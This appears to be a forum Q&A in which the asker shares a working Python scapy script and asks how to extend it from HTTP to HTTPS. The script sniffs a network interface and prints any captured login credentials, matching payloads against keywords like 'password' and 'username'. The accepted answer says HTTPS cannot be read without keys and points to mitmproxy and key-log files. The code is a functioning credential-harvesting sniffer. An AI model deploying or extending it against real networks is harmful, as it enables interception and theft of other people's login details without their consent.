# How do I add support to sniff HTTPS packets here?

Tags: python, security, network-programming, scapy, packet-sniffers

I have been able to use this to filter and view HTTP requests and packets so far. How do I include additional support to similarly view HTTPS packets?

```
#!/usr/bin/env python

import scapy.all as scapy
from scapy.layers import http


def sniff(interface):
    scapy.sniff(iface=interface, store=False, prn=process_sniffed_packet)


def get_url(packet):
    return packet[http.HTTPRequest].Host + packet[http.HTTPRequest].Path


def get_login_info(packet):
    if packet.haslayer(scapy.Raw):
        load = packet[scapy.Raw].load
        keywords = ['username', 'uname', 'user', 'id', 'key', 'email', 'email-id', 'login', 'password', 'pass', "passwd"]

        for keyword in keywords:
            if keyword in load:
                return load


def process_sniffed_packet(packet):
    if packet.haslayer(http.HTTPRequest):
        url = get_url(packet)
        print("[+] HTTP Request >>> " + url)

        login_info = get_login_info(packet)
        if login_info:
            print("\n\nEntered login credentials >>> " + login_info + "\n\n")


sniff("eth0")
```

Answer (score 1, accepted):

Short answer: You can't.

You probably need to look into HTTPS a lot more. Since everything is encrypted, you won't see anything without the private keys.
See
https://security.stackexchange.com/a/83039

Have a look at `mitmproxy` if you're doing this for a debugging purpose, or [`this`](https://github.com/secdev/scapy/blob/master/doc/notebooks/tls/notebook3_tls_compromised.ipynb) if they're using RSA on a key you have compromised. (I doubt you're doing any of those)

Comment: Usually NSS Key Log files are used to get private keys. Which can be acquired through setting environment variable in OS: https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/Key_Log_Format  Here is nice discussion to proceed: https://stackoverflow.com/questions/57498386/sslkeylogfile-environment-variable-doesnt-populate-any-text-file